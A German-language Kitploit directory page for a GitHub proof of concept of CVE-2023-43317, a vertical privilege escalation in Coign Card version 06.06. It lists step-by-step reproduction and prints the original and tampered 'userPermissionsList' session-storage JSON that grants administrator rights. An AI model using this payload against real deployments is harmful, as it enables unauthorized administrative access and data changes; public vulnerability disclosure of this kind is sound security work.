Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-43317 — Vertikale Privilegienerweiterung über Session Storage von Amjad Ali (CVE-2023-43317) | Kitploit
Tools/GitHubGitHub/amjadali-110/cve-2023-43317
Authentifizierung & AutorisierungPrivilege EscalationSchwachstellenanalyseWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubamjadali-110/cve-2023-43317

CVE-2023-43317

Vertikale Privilegienerweiterung über Session Storage von Amjad Ali (CVE-2023-43317)

Repository anzeigen
3vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-43317

Ein normaler Benutzer kann seine Berechtigungen über den Parameter userPermissionsLIst in der Session Storage-Komponente erweitern, um unbefugten Zugriff auf administrative Ressourcen und Funktionen zu erhalten. Dies könnte zu unbefugtem Datenzugriff, Datenänderungen und anderen Aktionen führen, die normalerweise Administratoren vorbehalten sind.

  • Verwundbares Produkt:- Coign Card
  • Verwundbare Version:- 06.06
  • Referenzen:- https://nvd.nist.gov/vuln/detail/CVE-2023-43317

Schritte zur Reproduktion

  1. Melde dich mit einem normalen Benutzerkonto an.
  2. Klicke mit der rechten Maustaste auf die Webseite und wähle „Element untersuchen“, um die Entwicklertools zu öffnen.
  3. Navigiere in den Entwicklertools zum Tab „Anwendung“.
  4. Erweitere den Abschnitt „Session Storage“.
  5. Im Session Storage siehst du das Objekt „userPermissionsList“, das ein JSON-Array mit Benutzerberechtigungen enthält. Die anfänglichen Berechtigungen für einen normalen Benutzer sehen so aus:
root@kitploit:~
[{"permissionId":1,"permissionName":"CanGetApplicants"},{"permissionId":5,"permissionName":"CanGetUsers"},{"permissionId":8,"permissionName":"CanGetApplications"},{"permissionId":9,"permissionName":"CanResendEmails"},{"permissionId":18,"permissionName":"CanGetCustomers"},{"permissionId":22,"permissionName":"CanGetUserActivity"}]
  1. Ändere die Berechtigungen im Session Storage, um Administratorzugriff zu erhalten:
root@kitploit:~
[{"permissionId":1,"permissionName":"CanGetApplicants"},{"permissionId":2,"permissionName":"CanCreateApplicants"},{"permissionId":3,"permissionName":"CanUpdateApplicants"},{"permissionId":4,"permissionName":"CanManageAccounts"},{"permissionId":5,"permissionName":"CanGetUsers"},{"permissionId":6,"permissionName":"CanCreateUsers"},{"permissionId":7,"permissionName":"CanUpdateUsers"},{"permissionId":8,"permissionName":"CanGetApplications"},{"permissionId":9,"permissionName":"CanResendEmails"},{"permissionId":10,"permissionName":"CanGetDocuments"},{"permissionId":11,"permissionName":"CanUploadDocuments"},{"permissionId":12,"permissionName":"CanCreateIndividualInvitations"},{"permissionId":14,"permissionName":"CanQueryIndividualInvitations"},{"permissionId":15,"permissionName":"CanGetBulkInvitations"},{"permissionId":16,"permissionName":"CanUploadBulkInvitationsFile"},{"permissionId":17,"permissionName":"CanUpdateFormStatus"},{"permissionId":18,"permissionName":"CanGetCustomers"},{"permissionId":19,"permissionName":"CanResendInvitations"},{"permissionId":20,"permissionName":"CanResendEvaluations"},{"permissionId":21,"permissionName":"CanResendManualReviews"},{"permissionId":22,"permissionName":"CanGetUserActivity"},{"permissionId":23,"permissionName":"CanGetDeliveredDocuments"},{"permissionId":24,"permissionName":"CanGetBillingTables"},{"permissionId":25,"permissionName":"CanGetBillingTableHistoricalRecords"},{"permissionId":26,"permissionName":"CanGetBillingTableDraftUpdateRecords"},{"permissionId":27,"permissionName":"CanGetFeedBacks"},{"permissionId":28,"permissionName":"CanUpdateBillingTables"},{"permissionId":29,"permissionName":"CanUpdateUserEmail"},{"permissionId":30,"permissionName":"CanGetTemplates"},{"permissionId":31,"permissionName":"CanResendApplicationEmail"},{"permissionId":32,"permissionName":"CanDeleteUpcomingUpdates"},{"permissionId":33,"permissionName":"CanCreatePolls"},{"permissionId":34,"permissionName":"CanGetPolls"},{"permissionId":35,"permissionName":"CanUpdatePolls"},{"permissionId":36,"permissionName":"CanNotifyIndividualinvitations"},{"permissionId":37,"permissionName":"CanSendInvitationEmail"}]
  1. Nach dem Ändern der Berechtigungen aktualisiere die Seite.
  2. Du erhältst unbefugten Zugriff auf administrative Ressourcen und Funktionen.

Bericht

https://amjadali110.medium.com/a-easy-vertical-privilege-escalation-via-session-storage-cfa9f558c94

Tool herunterladen